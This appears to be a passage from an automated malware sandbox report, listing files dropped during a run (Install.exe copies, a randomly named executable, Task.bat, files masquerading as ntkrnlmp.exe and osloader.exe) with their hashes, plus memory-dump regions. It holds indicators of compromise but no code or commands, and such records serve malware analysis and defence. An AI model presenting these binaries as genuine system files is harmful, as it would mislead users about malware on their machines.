| SHA512 | 8d518089a49590dc1b2789686e1a883c3a74be837142b1c821fe717fa5fb968b1f3b34d86bf9a7a13ed948278724839458c05a0df9a20de6a3c62f4d30857feb |
C:\Users\Admin\AppData\Local\Temp\7zS7899.tmp\Install.exe
| MD5 | efceaed78d58d2576bced83ae7711a9e |
| SHA1 | 5067586f7901ce55c92c464784c439ecf3fc9259 |
| SHA256 | dde8cf94abc0dbe01b28043ca3784f3770068d8398347dcee51fff5ce40e3c5b |
| SHA512 | cf2e87cdd6c724206a5d1ff7ef425dfacdce679b525d2adfb15e489e35abb2b029ed8beb6221fadf91f837b2055f707685ecb2265fdfc89d0eb13d1eff5344ee |
C:\Users\Admin\AppData\Local\Temp\7zS7899.tmp\Install.exe
| MD5 | 7dc2b57224739dfb6468dcc4c33d2543 |
| SHA1 | e7d9a0377a4b35ed02b28b9036cdfeb1937f8e6b |
| SHA256 | ef1482fb10c1f1ffbd9ee730d5d350d62331c390177bbf40d0ee5b4802ec3bc2 |
| SHA512 | e77d2b625221e8bfab149ad743530a7f4e291b1b1d2919686680e38add10c00f3483847d65a3a79e01987607c4a3f5d8250be4dbcbbfcf5371d10f00e6c528cd |
\Users\Admin\AppData\Local\Temp\7zS7899.tmp\Install.exe
| MD5 | 2cf09fc08c2543beb312d5119edddec3 |
| SHA1 | 03a338664667542d3ad5fcc59afbedc23aff5de2 |
| SHA256 | b6be3e8e7cdb42fbb2eb96b6a917539aa7867aa25577c22306cabea67bbb1edc |
| SHA512 | fc13f12070df74e48b2ef193b8dd6f8ab6987abcfaeb673457ed862f4c23aecb43bafed346f926598778b729b68e546a3eec317fa8e5a2e3a449e17e143179af |
memory/1820-619-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/936-623-0x000000013F940000-0x00000001403A1000-memory.dmp
memory/2452-622-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2472-620-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2844-638-0x0000000000400000-0x0000000000D1C000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe
| MD5 | dd1e94b096c5d53bbc79840375b2f94c |
| SHA1 | f6a85ae48cac30ac53fa458fade81b8ea6fedfed |
| SHA256 | 059f90cbd67bd6a76b3192af53509c78f748e2f1b71fc9d41d2da6b4842d4010 |
| SHA512 | 5bbe3f1121b24594d37b80b2f8e9a92e435c3028b9ab16e5c25003ee882178ad50c3ca56ca049ab0ec01b39d4c4aa778112bfaed7db825f242caa875ed7e35be |
\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe
| MD5 | b7486ed3265935ddd4bfbefbadb3c957 |
| SHA1 | 49ea29d43a90bb2d1ae90edcd556035dd3a0d700 |
| SHA256 | 070b479585bd83104c2ae78f1845f72e64026d7008148e8db677f5d8d11272e2 |
| SHA512 | 4b3c732a614dedebd8c6565c10ed925e3a1df4558a65d1915f43cc4d416bda371c66b4d1dd16fa60ed35e226f4d1324394a61f89920fdeea6dcb96557eeff399 |
C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe
| MD5 | c0038997e45ed3cab971c9daff006546 |
| SHA1 | 172896a5c1353413acc85a5db92e620cfcd56ef9 |
| SHA256 | 80386325264f92dcf9521905be0a55c301578e0f0a3ab6d2a6a78136dee6d094 |
| SHA512 | c6e99453cb5adff2f7cfad7f9474b1de5a9091681ed92d4641d04c655337589d4a8f200db9ea5eefb103984dcbb258c9b401dae6c34f1c584bd346fa9afa6af3 |
memory/2844-631-0x00000000027E0000-0x0000000002BD8000-memory.dmp
memory/2248-646-0x0000000000400000-0x0000000000930000-memory.dmp
memory/2860-647-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/1432-630-0x0000000002660000-0x0000000002A58000-memory.dmp
memory/2688-650-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/1432-648-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/936-654-0x000000013F940000-0x00000001403A1000-memory.dmp
memory/2688-651-0x0000000000400000-0x000000000063B000-memory.dmp
memory/1636-618-0x0000000002950000-0x0000000002D48000-memory.dmp
memory/1636-664-0x0000000002950000-0x0000000002D48000-memory.dmp
memory/1636-663-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2844-661-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/1432-617-0x0000000002660000-0x0000000002A58000-memory.dmp
C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe
| MD5 | d0e30134d261c00f8ffb08fb14c9b0e0 |
| SHA1 | 0d5dec2e103fc1ffaac0aaab0b4ba7ecb86a56c5 |
| SHA256 | dfe3f68b2d9395579c83f7e95e170efc5285596768fed3331e46f7073d540361 |
| SHA512 | 70afba48d4762c9eb4710813d6140ed301623e12a28be6e70c79781d54af30c951f85395b45a53fdc2a735e1ce3860a28ea27288c2b372c5fa64e910e401754c |
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
memory/2844-616-0x00000000027E0000-0x0000000002BD8000-memory.dmp
memory/2196-725-0x0000000000280000-0x0000000001FEA000-memory.dmp
memory/1828-743-0x00000000026B0000-0x0000000002AA8000-memory.dmp
memory/1636-742-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/1828-744-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/1432-750-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2844-752-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2836-756-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 03e03703fe5fc79e7f1d5e44e3c27b1e |
| SHA1 | 8f25ba10b5e479ae63c4c3867475502e1a6499fa |
| SHA256 | 504111bf8fb1386663a5f92bab46dc7b1171fb9c9a8b8cd100945a6c6bde311e |
| SHA512 | 1926c83c1f301800c289b16458ae30bc0927b231a5b11b12663d8a608c5ded27d8d73987ec6af46011e2f2b4e7e4c65fa7cfd50e5370d00e47784982874b88fa |
memory/2836-765-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5JSF9UQYJPISXBNAN4UM.temp
| MD5 | b399ec421b61081c80e79fa0dfb5d048 |
| SHA1 | 2a9bfac5618043123725320ea9474a0d0f193817 |
| SHA256 | c598b39250c0dbe8de09c84970e2ba6094f99cd313620c3d4d9bd715a910ae27 |
| SHA512 | d278595af67f2268f2e288faf27e3b0cd3d2f8a7641b6fbca89c74253ac633f64c7ae84d9d46ee969a56a4698fff1f2b169dadb1f23dfb3e229605bd043a45ec |
memory/2560-789-0x000007FEF4BF0000-0x000007FEF558D000-memory.dmp
memory/2560-790-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2876-791-0x000007FEF4BF0000-0x000007FEF558D000-memory.dmp
memory/2876-792-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2688-797-0x00000000002B0000-0x00000000003B0000-memory.dmp
memory/1260-796-0x000000000B920000-0x000000000C381000-memory.dmp
memory/2688-798-0x0000000000400000-0x000000000063B000-memory.dmp
memory/2876-800-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/936-802-0x000007FEFD500000-0x000007FEFD56C000-memory.dmp
memory/936-803-0x00000000773A0000-0x0000000077549000-memory.dmp
memory/2560-804-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2560-805-0x000000001B750000-0x000000001BA32000-memory.dmp
memory/2560-806-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2876-807-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2560-813-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/2248-814-0x0000000000400000-0x0000000000930000-memory.dmp
memory/2560-816-0x00000000029D0000-0x0000000002A50000-memory.dmp
memory/2248-815-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2876-817-0x0000000002B50000-0x0000000002BD0000-memory.dmp
memory/2688-823-0x00000000002B0000-0x00000000003B0000-memory.dmp
memory/2688-824-0x0000000000400000-0x000000000063B000-memory.dmp
memory/2844-825-0x0000000000110000-0x0000000000130000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | 8cc3f16cab15fa995d5495159ffb831d |
| SHA1 | cf8f4899c7ad50dccbac4c5016ae8d1f7b819342 |
| SHA256 | cd0406f6b6cd34549ee86524287298c0e0c2c1a2911ebfd2c08bf9979d096e21 |
| SHA512 | 53882105f8d64ad57568fbba9bb8c5bfeea3d105fee03f39d3eee91eac198674c2d23164fe66ee95f8664d108a77663b7bb11916cc069fb81265baa210d2ecd9 |
memory/2844-833-0x00000000741F0000-0x00000000748DE000-memory.dmp
memory/2844-834-0x0000000000310000-0x0000000000350000-memory.dmp
memory/2196-835-0x0000000000280000-0x0000000001FEA000-memory.dmp
memory/1828-836-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | ff6b577deccccaa424fad04e7a477dcd |
| SHA1 | 20b6e57af72cc5c049d1b8a34f187332f986fb67 |
| SHA256 | 45d2d782423291027e18a1fc802012b63c1afcebac8d899d8b67f3ab4d0d0a6f |
| SHA512 | a1a7872855b08a6e655ce2b342c9c20cd5663edf3846603dfde331e40c42034fac8c987e5dc509fe4f18e27b8a0138ce937690a52d87dfbe44fa632246fd4c74 |
memory/2844-843-0x00000000741F0000-0x00000000748DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
memory/2560-858-0x000007FEF4BF0000-0x000007FEF558D000-memory.dmp
memory/2876-857-0x000007FEF4BF0000-0x000007FEF558D000-memory.dmp